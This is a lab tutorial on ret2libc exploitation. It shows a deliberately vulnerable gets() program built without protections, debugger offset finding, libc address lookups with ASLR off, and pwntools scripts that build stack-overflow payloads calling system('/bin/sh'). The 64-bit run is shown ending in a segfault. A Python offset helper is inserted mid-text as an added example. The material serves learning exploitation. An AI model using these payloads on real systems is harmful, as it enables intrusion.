ret2libc

When a program is built with NX protection, traditional shellcode placed on the stack cannot be executed, so a shell cannot be obtained that way; the ret2libc technique can be used instead.

Vulnerable program

#include <stdio.h>

void vuln() {
    char buffer[64];

    puts("Overflow me");
    gets(buffer);   /* no bounds check: input longer than 64 bytes overwrites the saved return address */
}

int main() {
    vuln();
}

gcc vuln.c -m32 -fno-stack-protector -no-pie -o vuln-32

└─$ checksec --file=./vuln-32
[*] '/home/kali/exploits/ret2libc/vuln-32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Exploitation plan

Point eip directly at system('/bin/sh')

Determine the eip offset

[0xf7fe4450]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
[+] SIGNAL 11 errno=0 addr=0x41614141 code=1 si_pid=1096892737 ret=0
[0x41614141]> wopO 0x41614141
76

eip_offset == 76

Get the address of system

(Note: ASLR is disabled here)

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ldd vuln-32
        linux-gate.so.1 (0xf7fc7000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)
        /lib/ld-linux.so.2 (0xf7fc9000)

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ readelf -s /lib/i386-linux-gnu/libc.so.6| grep system 
  3172: 0004c800    55 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0

system_addr == 0xf7c00000 + 0x4c800

Get the address of /bin/sh

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ strings -tx /lib/i386-linux-gnu/libc.so.6|grep "/bin/sh"
 1b5faa /bin/sh

binsh_addr == 0xf7c00000 + 0x1b5faa

pwn code

from pwn import *

context.binary = ELF('./vuln-32')

p = process()

libc_base = 0xf7c00000
system_addr = libc_base + 0x4c800   # offset of system from readelf above
binsh_addr = libc_base + 0x1b5faa   # offset of "/bin/sh" from strings above

RET_OFFSET = 76
payload = b'A' * RET_OFFSET
payload += p32(system_addr) # return into system == pop eip
payload += p32(0)           # [esp] == system's return address, not important for now
payload += p32(binsh_addr)  # [esp + 4] == system's 1st parameter

p.clean()
p.sendline(payload)
p.interactive()

64-bit exploitation plan

In x64 mode, arguments are passed in the registers rdi, rsi, rdx, rcx, r8, r9, so to execute system('/bin/sh') a {pop rdi; ret} gadget is needed.

Get the libc base address

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ldd vuln-64
	linux-vdso.so.1 (0x00007ffff7fc9000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dce000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcb000)

Get the system offset

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ readelf -s /lib/x86_64-linux-gnu/libc.so.6| grep system
  1023: 000000000004c330    45 FUNC    WEAK   DEFAULT   16 system@@GLIBC_2.2.5

Get the /bin/sh offset

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 |grep /bin/sh
 196031 /bin/sh

Get the ROP gadget

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ROPgadget --binary vuln-64 |grep rdi
0x0000000000401042 : fisubr dword ptr [rdi] ; add byte ptr [rax], al ; push 1 ; jmp 0x401020
0x00000000004010a6 : or dword ptr [rdi + 0x404038], edi ; jmp rax
0x00000000004011cb : pop rdi ; ret

Locate the rip offset

[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0
[0x00401159]> dr
rsi = 0x00000001
rdi = 0x7ffff7fa1a20
rsp = 0x7fffffffe308
rbp = 0x4141584141574141
rip = 0x00401159
rflags = 0x00010202
orax = 0xffffffffffffffff
[0x00401159]> wopO `dr rbp`
64

rip_offset = rbp_offset + 8 = 72
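The two offset lookups above (the 32-bit `wopO 0x41614141` giving 76, and the 64-bit `wopO \`dr rbp\`` giving 64, plus 8 for rip) can be reproduced in plain Python for crash triage. This is an added example, not code from the original notes or from radare2; it assumes r2 builds its cyclic pattern as an order-3 de Bruijn sequence over the charset A-Z, a-z, 1-9, 0, which is consistent with the pattern printed above.

```python
import string

# Assumed r2 charset/order for wopD/wopO (matches the "AAABAACAAD..." pattern above).
CHARSET = string.ascii_uppercase + string.ascii_lowercase + "1234567890"
ORDER = 3


def de_bruijn(alphabet: str, n: int) -> str:
    """Lexicographically smallest de Bruijn sequence B(k, n), built by
    concatenating Lyndon words (FKM algorithm). Every n-char window occurs
    exactly once, so any window of n+1 chars pins down a unique offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
            return
        a[t] = a[t - p]
        db(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


PATTERN = de_bruijn(CHARSET, ORDER)  # 62**3 = 238328 characters


def crash_offset(value: int, bits: int) -> int:
    """Offset into the pattern of the bytes that landed in a register.
    The register holds them little-endian, so decode that way before
    searching (what r2's `wopO <value>` does). -1 if not pattern data."""
    try:
        needle = value.to_bytes(bits // 8, "little").decode("ascii")
    except (OverflowError, UnicodeDecodeError):
        return -1
    return PATTERN.find(needle)


def ret_offset_from_saved_rbp(rbp_value: int) -> int:
    """x86-64: `ret` pops the slot just above the saved rbp, so the
    return-address offset is the rbp offset + 8 (the page's 64 + 8 = 72)."""
    off = crash_offset(rbp_value, 64)
    return off + 8 if off >= 0 else -1


if __name__ == "__main__":
    print(crash_offset(0x41614141, 32))                   # 76: 32-bit eip offset
    print(ret_offset_from_saved_rbp(0x4141584141574141))  # 72: 64-bit rip offset
```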

64-bit pwn

from pwn import *
context.binary = ELF('./vuln-64')
p = process()

libc = 0x00007ffff7dce000    # libc base from ldd above
system_offset = 0x4c330      # from readelf above
binsh_offset = 0x196031      # from strings above
system = libc + system_offset
binsh = libc + binsh_offset
rop = 0x4011cb               # pop rdi ; ret
payload = b'A' * 72          # rip_offset
payload += p64(rop)          # pop rdi ; ret
payload += p64(binsh)        # rdi = "/bin/sh"
payload += p64(system)       # ret into system
payload += p64(0x0)          # system's return address

p.clean()
p.sendline(payload)
p.interactive()

The result has a bug???

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ python expvuln64.py    
[*] '/home/kali/exploits/ret2libc/vuln-64'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './vuln-64': pid 1953037
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ ls
[*] Process './vuln-64' stopped with exit code -11 (SIGSEGV) (pid 1953037)
[*] Got EOF while sending in interactive